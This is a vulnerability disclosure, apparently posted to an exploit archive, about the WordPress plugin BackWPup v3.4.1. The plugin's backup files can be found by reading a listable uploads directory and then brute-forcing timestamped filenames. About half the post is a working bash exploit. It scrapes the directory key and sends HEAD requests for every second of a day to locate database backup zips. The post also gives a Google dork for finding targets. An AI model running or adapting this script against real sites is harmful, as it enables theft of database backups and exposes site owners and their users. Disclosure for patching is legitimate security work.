Title:Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file downloadThere is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but it uses that same string to create the storage directory under wp-content/uploads/ which in most installations of WordPress allows file listings. Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file as its structure is just a date and time stamp. It would take a Maximum of 86400 tries to guess if a backup is available for that day. Filename format: backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s Default settings are: %d = Two digit day of the month, with leading zeros %m = Day of the month, with leading zeros %Y = Four digit representation for the year %H = Hour in 24-hour format, with leading zeros %i = Two digit representation of the minute %s = Two digit representation of the second https://wordpress.org/plugins/backwpup I have an exploit available if you're interested. #!/bin/bash #Exploit for Wordpress Plugin BackWPup v3.4.1 #Download https://wordpress.org/plugins/backwpup #CWE-552: Files or Directories Accessible to External Parties #CVE-ID: CVE-2017-2551 #Google Dork: inurl:wp-content/uploads/backwpup #Add banner about vulnerability KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'` #Add error checking here echo "[+] Getting Unique Key $KEY" DIR="backwpup-$KEY-backups" echo "[+] Checking directory $DIR" WPATH="$DIR/backwpup_$KEY" echo "[+] Creating Path: $WPATH" #use date command here for the default date of current day MONTH=09 DAY=07 YEAR=2017 Z=0 echo "[+] Scanning website for available backups:" for y in `seq -w 0 23`; do for x in `seq -w 0 59`; do Y=`echo "scale=2;($Z/86000)*100"|bc`; echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%" for z in `seq -w 0 59`; do Z=$(( $Z + 1 )); CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip"; RESULT=`curl -s --head $CWPATH|grep 200`; if [ -n "$RESULT" ]; then echo "" echo "[+] Location $CWPATH Found"; echo "[+] Received $RESULT"; echo "Downloading......"; # wget $CWPATH exit; fi; done done done echo "Completed."